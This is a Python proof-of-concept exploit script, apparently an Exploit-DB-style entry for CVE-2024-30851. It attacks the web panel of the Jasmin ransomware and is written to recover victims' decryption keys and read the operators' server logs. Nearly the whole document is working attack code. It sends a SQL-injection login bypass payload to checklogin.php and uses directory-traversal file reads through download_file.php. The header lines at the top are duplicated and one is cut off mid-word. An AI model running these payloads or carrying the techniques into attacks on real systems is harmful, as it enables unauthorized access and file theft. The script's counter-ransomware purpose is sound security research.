# Date: 2024-04-04
# Exploit Author: @_chebuya
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Versi # Exploit Title: Jasmin Ransomware arbitrary file read
# Date: 2024-04-04
# Exploit Author: @_chebuya
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: v1.1
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2024-30851
# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login
# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main
import requests
import argparse
import os
from bs4 import BeautifulSoup
def get_file(jasmin_url, filepath):
response = requests.get(
f'{jasmin_url}/download_file.php?file={filepath}',
allow_redirects=False
)
return response.text
def get_keys(jasmin_url):
headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
}
data = "username=&password='+or+1%3D1+--+-&service=login"
login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)
cookies = login_req.cookies
list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)
soup = BeautifulSoup(list_req.text, 'html.parser')
rows = soup.find_all('tr')
print(f"Dumping decryption keys from {len(rows)-1} victims")
for row in rows:
data = row.find_all('td')
if len(data) == 0:
continue
username = data[1].get_text()
hostname = data[0].get_text()
filepath = data[7].find('a')['href'].split("=")[1]
print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")
parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")
subparser = parser.add_subparsers(dest='subcommand')
file_parser = subparser.add_parser("getfile", help="Read a file off the server")
file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")
file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!
keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")
keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")
args = parser.parse_args()
if args.subcommand != None:
target_url = args.url.rstrip("/")
if args.subcommand == "getkeys":
get_keys(target_url)
elif args.subcommand == "getfile":
target_file = args.file.replace("\", "/").replace("c:", "")
target_path = os.path.join("../../../../../../../../../", target_file)
print(get_file(target_url, target_path))
else:
parser.print_help()